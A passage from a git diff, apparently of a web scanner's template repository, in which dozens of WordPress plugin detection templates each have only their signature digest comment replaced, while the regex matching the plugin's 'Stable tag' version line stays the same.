b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index f1d5a70eb4..3ca2fc44f5 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022031c9bcad3eb516e9a5830ec73445304e034fa5a553a0c414d9991d90972a09bc022100a5ca622e3d51f2919635c7b34fca48e3f979c1f5baf5b8a52b30ab1787c5ebf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220348dd68eb2a26eabc28a548cab79031fd17fe7d3369d8263c5548cf417d6126c0221008097b9b7f116e0f2527ba528e136188256add0933365811f7ce00c6d36707e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index f60afb652f..97681aba2a 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e00947449558922041773cd8546e16ff13c92db507ac531216e9af8db1bddc32022077b06539271a1d9d526f4e83c61a9d6b4df075805ef78c489b4b2bb71a15297e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022047f19cc9a459eef0f1b7b481cc5ceed0c5c516dfafb09315cb8931dfd8a60d74022100953fc8e03172f4429182fe7a6c7fbfccf43c9e319de957da68ae1bd1be68bde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index b43285876b..b8724712fb 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203caa2599078e93a074fe06ef93d12a8527a7dab8c817a449be322de319cdd07502206bf223bede9fff2e3178a2eb02454727a560d9e3ee60bbffeb5c37f4fc0f50da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205daafad6c64279442c064c03f6cab5be2ef8c7b42bf1369bc242734019fb5b4f022068ea0cc27be9fc6eaca6a7520b1eb6da396ce68b2bddbf277021e57c76893890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 0575b928fa..cbc37a6e25 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210083315530e91bfe33ebf42235babb88459eed0211b88a24429a84dcd7e0400857022100e1612b62293f34e1d87b6a497dd158cca28d73924bff5b807d851375b913ea6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205baaa9ff59f7d7e6844a7d2f221858a3720bcefc322bf238989ce60ecf3b5b7b022100bb4df5dbfeca048d84a7eb22db797069ecfe1c670bc816f76bbc9a8c67b49bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index b8dd6b02cf..d03226a448 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a8222a8577c078b18bca24e79c6a82ef760dbb9de43976e195bfc512441f7e660220352b75ee36162817c513d936de404395f50e14b3266e59b845f32cfe15902d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220061c260f93dbcd6aca3325dd20e65db1eb610c6d5ef3462e518338644927507c022100f33c03ec7cc1d2f740e5b227cc12bfce9be80504d56f8cfd62f2532440d7569d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3ac1ad5ae6..5b5b6d9598 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220113656452742836eb4f80f9a169ab2be3af5f42863810f09b469377eda69414b022100c874b8ccc4223632ea0af3e106258e4d50a50d1b991edd31e527729b85fe71db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f53321f471e5d63588f4cfd6a91abdd082cb9b31b473c4704666bd350e6c1d5022100c8b3e1a79a6f1d9fc098586eb87e79be59d6eee342e41cec6b98a377ff2a6ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 3235262ecd..4b3175b79c 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008b7c0a327a636bf1da8f2cb17f01033e75775a3d1a59207d1d5b47861ab16eab0220064fd122efe126f63d8cec32819dd77e49be64d4c0b8cb74d3abe94d1600c094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022056aed7e67066343c993371853554eb311bd69a9a41920e8dce1d92d108f28e7802202541da3514c769c5337dc8f7898227e2cbe4cf9ebea0ff05d863c15d7aa81c2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 54e27cfd3e..68fd91bf17 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022045ee8aa5ad7fc46e140d8b40c3b68a01f6032f1a98ae3f751a63dffac39fc5760221008f625d5fb38f695d819f30519907a86797af7ef88b05b47102b3d4f7cfdd37c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0de502a1b3bd023ef9125a7e236415508a32c4eb2f306e41781cad40b5f666502207fd7d8636eb8e4e131a763599c5be2cab339342bcbfc1338837032282ce0d09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index eb008b657a..ebb76be279 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022047973994aa7703ac56c1aec85236c4c905830de3fd970240cd064f0929f03309022010e8d0cfddad12e2f55b604f95a6c8bd5d0c5e8c9e4874073edf3e0ae15dd1bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084b825a94510cc9cfc0e9d6351c08458865c806af4826978a60a46d4961d259b022100894d57cf13ddee3e42f28975cba8252b86fb84e5404d761ff16731f9fd07a82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 4b2bad3729..d398eaa920 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203cb076c53608617dcc4e00b7201d624f36522c287457d14b5e6cb5577b4fc2120221008d0fe4836b5ac5103072050253556679669803230386cfde4a28a3d94751ff51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022050a1120965c88a41381c00d9ce64a439a61c8c3ff71a1200b569e82c7867763302207e709dcfd43f00e0a2ad5794dd510160c10db388a61ed0683eaa4c2cba4c2507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 8f6d430329..4c7ff88f29 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ba3f4e4559c3f037bd7c55563527844c6a1ed973aac72e5cbb27506c648312f3022100ebcc55b4b3742421aefbedd0d779e3276972f68f9f48f3c06b4855eb0621a515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb490368fdc75d6ba06ea0a70c47259cc8086bbab61685d44d33ba7dd27c102902206327b7bc614e8ab46d56d9920b89383d9c2c97f9122ae4f7e49528d3e39eb2b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 4ac9dc7d89..ef30de7cc0 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204fd9c435542dbebde27c51ef23747bc5249f4076672bad3052fde004c10c2060022100f866d9db4cc2295d7497fab35017f7fbb97491b5c4f7959c1ae867191c5f35d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220301eeba94d75feae33553910d5600905edf6ae6c7806318c18850ad17629bdf6022100dec8d6ddd7bb78f288f47a5210375442a1de6e4279200b57249de5273a14bb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index cb16d17345..e12afd712a 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dfe292a89bbf1de8902d6ff146b15b061b9d38aca0fe205ab5fa2c4f73946717022100a352968540cbfb35aedf2cf69570ba5e1482adb648eb6a4679a96772f7ac1f7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100880b62a99ca878152f406c03a50a8bac06461d00eed67bdd028e10ed43565dad022100e2796f6eeb1e12167dc9bdd8c8b2a6f02c867b2d9755e0dfd5bc2e4179d2287c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index c8e8a3f5ed..7ec570c01c 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210089f1a4d0212e9a93484a025e7c19934d2ce50b12a51f27848f59a1d7ae1e6db1022100e7fc4173d609a84e9d48754573b13c81182e685537bd7c4a96654875b28b4ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae56425f54d3a8d92d482a29a4ba9d5aeaedcd837c63517513e136872144fe0702210094c0af8474205777dd198c647486576982fa177752cfa2deed4f71d48e406bd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index bf2f08407c..ff156ff2dd 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206c8cd36f7fba83ede9e9709254fa9da7e67b5e95ab5b8781ebeab8e5d1566d2b02202e81fd0344b2b1ee1f8ab9f303ba7666380b2aa4544bc93620721a070d6b98d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004987928377424d2476676a648e3c71b52b00493e45c69c0be20984b1ef3115a02207b37d1d399445d51341d911a58b1fdf0f372a71967dda6a703098135961e6c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 68fa285170..5fed000667 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e52c49e4b301547f69e0f2f1989e344e534d8d1ed72237afec9f71a56c9cb346022100f4cfd461340ac7fa9dca96b09b1bb0412961ff69353b3de60a60c5a980d8ba47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060b2159b4a5dc6d9805ac26bae31a8b529d91668aadbf020193ed0c94afaacf3022100887b939faaab4c4d2139a6f7295b5821693ef36889ead98c82cc07b42b5d3814:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 59aa10b524..3b0b34ee75 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022012656ea87c8f79b4a80c579ae4fe8253dc98a82269d52063896efecc5578ccdd02205ec7fcc3684301744e5c31df20c256ab678bdd59bf51629d4d3fb54e7defca3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea2ec10799438ac4d2d1097ba2c8e4aaf316d33a7934f6885431ad661c7382e1022100d0e420271ba6ccf2dbb238dd67004945a104814204e8e2ba2aafee787c0931e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index fd94faa51e..8ca450bb37 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dc806e6bece78f1152245f985b0f4f201106bdf6fe64d3515d64240e4398da2002200a4d85688feec1a0eb43dd6bd47503f544004f6a81ffc644f5af0221fdc7ae30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202626e1d61a0cf7717afb91b551e6c2aa7a4b02947df58bcde287759e45e6d24902205673d729d615fc8515e6191627b420eb59fe7e426e30e2095bb5dfd7ec3f39c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 5ab5297c85..7c2c668eff 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e0adcf0171f78f2e84e6271ee382ba910050fcfb50da2770247f7221214f8eb602205d90b83415c9b648fbca7f7a874402457f9c66c58a040824f4bf60dfdc9a7266:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015f293a0a88f85ef2ff9097d3b7d5fb0ba2769039afe9961eaabc000dc6f9991022100a20d2498a861a3b91772e8b63785e9b353ffbdae5054fa919a6e80977922cfc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 2d5a136c35..14a8d44043 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220698ff7072d3afd1cc588d2136e058aaffbfb131157c89ffb9cb426a30acbafd2022100dd3235b09d7086e7580820c47a6605936b8884b474b65a848f906c41292bd88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ddc3d62f9124aa481be5618dda8d9f93fd1ff7ec1c4293459802eb269a98d1cc0221008cd662b5beb61ce9d958950e8e5d5aa9ffdf2f6bb9e185a68152ad400b21b377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 74f189ca19..055e8aaa14 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201f70405550e966e80be07c7a7f3c8e4d0d419b2fabc768a29dae505e6d66e7be022100fb334e3d43d9efb1873db58438422b111d03987400eb3daf64aba5cf8c325233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203935b6bc98152a4c450369d31b2beb062fed61290ca232db6586579b26f7da3b022006ae05572edad24f75c584b5ee9ea75be02d194f11120f841619387d478e649b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 9a0e8a8bf0..b8d36595de 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201e742ba64e3c979b119f38b302479a07d6e39eb5c38b10d231b4301f7e596188022100812d82d72c0251e8d902ec13ab4bb402fde8f641d7beafc5fb7bdeef882590ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a84e93725f7afd6f011d94c0319e8b062302a2aaf9b0fcc1f9942b52286912b3022100fd0c5ab155e120b67f824df48c48234a6c1f77ca2ef90ab7968b0f488665c387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 44cf1731d7..ffa7ac5945 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100cdb5c9e45f77df844884ba4bbd2e7671232711658834fe3fe762b80b95ea9fa402203cdc0b587a210e0fe069c01724412b9abdb31d8a6f88365ba32a5ffd99886928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d64f47714f9e9a4462d9467c7a93135c49c9fdf97f09cc68ca296ed31363e7c802201e942534252420a9f83236ece8b22ca2a61bb7cc50313741168174ecb3cc943d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 75c9c60e36..8484824dd1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100922454326dfc181ee07fbe4a71fd3e3464a5cfab29ccd6f5a156cd0b1aa77ff802206326792f94273c2005c2271c8eec98bb5ae8589eb314ee3722e4d8aa524905b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f717420a4f7d0616a572c13042f703d10c0c9d3d409dd6298a4e24ab0128d85022100cd64a3bea49227fccaa934fc1d638fd76fde90bf26ea849768f60a36f5647f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index 9092bfaece..7aa5730f6b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022020858e7fb3c882d2e23d27dd4335df9eb7e52a132048b0caab7cc1d38fb4406d02206be2ab5e8ec31324a96a3e8a8b2c4042f1109955d9994cd5dc1b0dab7a0e5552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220309c3b856f95bd2ab4cc543b7fbb22e26178ddc649de5a14eac88ea136227c42022100eb977179ab13d7be0e42fa33172a64f7e1876c1a309da6037da13ae542002d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 2f6a0f8521..8e4f3f0966 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d829a4994ab6256d0b3239d9031b4208af7344267ae25064776ed1fe8b6c5e9402200b00edd18d8b37846e9568e243d09dc0806572bac5eaa920f09707ccf8a26d0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064653aae9a028d93f2cf158dfb5879eb714e3b5762f828496f6793f8d89355ed022009d70f7fcd904d34dfcf448a0d2b914b24a88656a9658508b74e1167d9de60df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 3870810426..952d88d3ae 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e0aec076b5b392a6b8371ee8bed4639ebeb30d6333ce37d15898d17ff272165e0221008554e8058b8b3139e9aca3c667b942340433c472509b5310bcafbfa555405538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207e4a0b8b3e845461e1ff3852ad1df97c13537a46a6846418d35d23bc435570b50220420a1fa3650c6b2ceeababd11c42344788311e18675a9dd217798bd14c719f14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 8ae8225cc6..a93413f2b2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022044e094a30ff9cc02b25043ba5e5e9f62157e2cfe62f065ceb1a513dd12f621c40221008f76f2735cd06d9608869d94831d1e5fcd74cfb3c8bea4d60f78bc1ba8f8f29d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0aabbbbd01d68085146f3bade399505ada159575f5b9456e7561372fec222240220526f5ad2c85f877dae08b85295b117fc3eeccc4a03c66103d3d34cb33385baf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fd86741f84..175574267f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100fea3cefac53fba24da845dae34d4738235e6beffd6904254092759b8865c88d3022100b0692c25f982dff5a798e4be827cae5a169dd498b775a8782c2c6a69cc6a35bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd6ae53da41150d02b558d8bca356d6c1aee9c788efec92cd8a26c0bb873866602207a23943168bd907957e69b8b3ef36a5e7b837940b36357ec776f890093257e12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index b9ba10fdad..c0ae835880 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204881d5bc172ce5b6430b7bf6dda8cd92281d1ce8c5d9b5f2f60106f674416f940220172417ebba949a0ce9ba5ca574e8c2467b1b3ae2fcd910d20c7449c4f4018b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009dccb50f99287e76497507e46121692b2b03c544097e3bcf9a65d5f7af7e883d022100f62f8def7d74c419d562a1c87df3b09f84ca547ab7502ceaa674fa8d8bb68892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 078dbacb6a..c0b3fcd6ed 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202fddfff79d20f64c54d0b473099fe9dd3d028916900e8b898d6594b5d008575f022100a67e6bd24c57bd8b8cf2b8c2de5bdc3a58738283130e39e0c87bb7e267010c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220030329cbca4c263bd0cf912b369e26dc6e30fb56c9a01d94d1a5e5ccf554a90c0220661cb952aaa039902ab28c0337e49a2e0e806addc79d9fd021c05019d3762ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5b56fc4d5e..5f618ce14b 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100bd471df62b98cc18fe45c7c5ed951a38b24aaeb78b835ccc23e666c96620f6f602203360e485707b1e8be25d4984f3475b5ed909df79bd14dc6585c5a512f98f53e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f192ccd6c08b0d3f569ed8940c2fcf3571620497a144cd6f70b1a4ef7d0e8ba302200f232df0ead9e8bd3440da7f36ced00f165933dc618f372174a21e5a9a232d6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 8049dc0c2b..3640949dc1 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203618bd1ac690a55846b298426faf4fb37ebcf08e68225eb16842bd735b5419f702205ba32df6c06ac2ace2ae3955061fc606375f985b8155a5a66be5a129e5a0e8c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b2e34027d6121c6d47311823b9d7ba0006aa8d439e97fc7227c84903c75468602200d9048bb311e229f93e509b4e4180fea37b383a93f4e5c08f4c6e7b418c77d59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 13b0522e60..b6452787b6 100644 --- 